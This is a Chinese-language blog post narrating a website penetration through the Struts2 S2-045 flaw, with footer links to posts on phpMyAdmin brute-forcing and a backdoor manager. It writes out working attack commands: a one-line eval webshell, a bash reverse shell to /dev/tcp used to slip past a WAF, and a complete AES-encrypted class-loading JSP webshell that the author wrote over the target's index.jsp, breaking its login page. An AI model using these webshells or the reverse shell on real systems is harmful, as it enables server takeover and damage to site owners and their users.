一次奇妙的渗透

About 渗透

前言

最近应领导要求,开始疯狂搞站,然后大家各种骚操作齐出,因为我比较菜,就一直扫扫扫,然后就有了今天这个博客,想办法绕过它的防护措施。

正文

一开始,就是使用某扫描器扫出了Struts-045的洞,很开心,就去利用,然后发现,利用失败:

image

于是,求助于大哥,大哥又发了一份struts2的漏洞利用工具,然后成功了(我真的是R了Dog了,看来有个好用的工具很重要啊):

image
很开心,可以继续执行命令了,然后发现大哥的工具就是流弊,功能很全啊:

image

一一尝试,WHAT???全都不能用,陷入绝望,好在还能执行命令,OK,那就一切都好说,于是乎,我就开始了我一系列的操作。

先看了下目录下都有哪些文件,然后我是什么权限,权限还行,

image

然后,新建文件,写入webshell:

echo '<%eval request("aa") %>' > 1.jsp

发现失败了:

imageimage

然后往它目录下的123.txt里面写123,成功了:

image
image
image

写继续往123.txt中写一句话,失败了:

image
image
心中一万头草泥马飞奔而过……

然而天无绝人之路,一怒之下,直接反弹shell,然后继续写入文件:

bash -i >& /dev/tcp/ip/port 0>&1

image
imageimage

成功了,成功了,成功了。之前的一些敏感操作应该是被waf一类的给拦截了,通过反弹shell ,应该是绕过了waf,也不是很清楚原因……

然后,更尴尬的事情来了,我写入了webshell,却TM的访问不到,这可咋整,死活找不到自己的webshell。然后,我盯上了他们的主页……

也就是那个index.jsp,然后就是,小手一抖,shell到手,然后他们的那个登录页面,也就是主页,就么得了……

看操作:

echo '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>' > index.jsp

然后,主页就开始无限弹窗,至今也不晓得他们的网站是一个什么运作原理……


PS:出于安全考虑,写博客的时候,已经过了那个测试的阶段了,所以不能再直接写进人家主页了,后来也成功写入了可以访问的文件,拿到了shell,这次渗透就告一段落了~

image

之后的博客中会不断更新关于渗透的一些文章,我这博客,随缘可见。


Reprint please specify: wh1te 一次奇妙的渗透

Previous
phpMyAdmin爆破神器 phpMyAdmin爆破神器
About TOOLS 前言对phpmyadmin这个让人又爱又恨的东西,最近几次演习都有碰到,一般都是手试弱口令,有点low逼,也有写脚本完成的,最近发现了个好用的工具,phpmyadmin爆破器,亲测实际可靠。 phpMyAdmin
2019-09-15
Next
phpsploit的使用 phpsploit的使用
About TOOLS 前言除了中国菜刀,CKnife,冰蝎以外,最近又在用一款比较骚的后门管理工具,早就出来了,最近才在用,功能也比较齐全,使用命令后进行操作,这里做一个简单的记录。 正文这里先放上工具的地址:phpsploit
2019-09-14
TOC